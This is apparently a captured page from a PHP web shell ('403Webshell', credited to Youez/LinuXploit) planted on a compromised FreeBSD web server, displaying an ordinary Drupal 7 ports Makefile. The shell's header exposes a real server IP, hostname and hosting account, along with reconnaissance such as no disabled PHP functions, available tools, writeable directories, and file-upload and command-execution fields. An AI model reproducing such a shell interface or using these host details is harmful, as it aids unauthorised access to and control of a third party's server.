403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/www/drupal7/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/www/drupal7/Makefile
PORTNAME=	drupal7
DISTVERSION=	7.92
CATEGORIES=	www
MASTER_SITES=	http://ftp.drupal.org/files/projects/
DISTNAME=	drupal-${PORTVERSION}
DIST_SUBDIR=	drupal

MAINTAINER=	joneum@FreeBSD.org
COMMENT=	Database driven web content management system (CMS)
WWW=		https://www.drupal.org/

LICENSE=	GPLv2+
LICENSE_FILE=	${WRKSRC}/LICENSE.txt

USES=		drupal:7 php:web shebangfix
USE_PHP=	dom filter gd hash json mbstring pcre pdo session simplexml xml

SHEBANG_FILES=	scripts/password-hash.sh

NO_ARCH=	yes
NO_BUILD=	yes
DOCS=		CHANGELOG.txt INSTALL.mysql.txt INSTALL.sqlite.txt \
		LICENSE.txt README.txt COPYRIGHT.txt INSTALL.pgsql.txt \
		INSTALL.txt MAINTAINERS.txt UPGRADE.txt

OPTIONS_DEFINE=		MYSQL SQLITE3 PGSQL DOCS
OPTIONS_DEFAULT=	MYSQL

SUB_FILES+=	pkg-message

PGSQL_USES=	pgsql
PGSQL_USE=	PHP=pdo_pgsql
SQLITE3_USE=	PHP=pdo_sqlite
MYSQL_USES=	mysql
MYSQL_USE=	PHP=pdo_mysql

do-install:
	@${MKDIR} ${STAGEDIR}${DRUPAL_DIR}/sites/default/files
	(cd ${WRKSRC} && ${COPYTREE_SHARE} ".htaccess cron.php authorize.php \
		includes index.php install.php misc modules profiles \
		robots.txt scripts themes update.php web.config xmlrpc.php" \
		${STAGEDIR}${DRUPAL_DIR})
	(cd ${WRKSRC}/sites && ${COPYTREE_SHARE} "example.sites.php all" \
		${STAGEDIR}${DRUPAL_DIR}/sites)
	${INSTALL_DATA} ${WRKSRC}/sites/default/default.settings.php \
		${STAGEDIR}${DRUPAL_DIR}/sites/default/default.settings.php.sample

do-install-DOCS-on:
	@${MKDIR} ${STAGEDIR}${DOCSDIR}
	${INSTALL_DATA} ${DOCS:S|^|${WRKSRC}/|} ${STAGEDIR}${DOCSDIR}

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit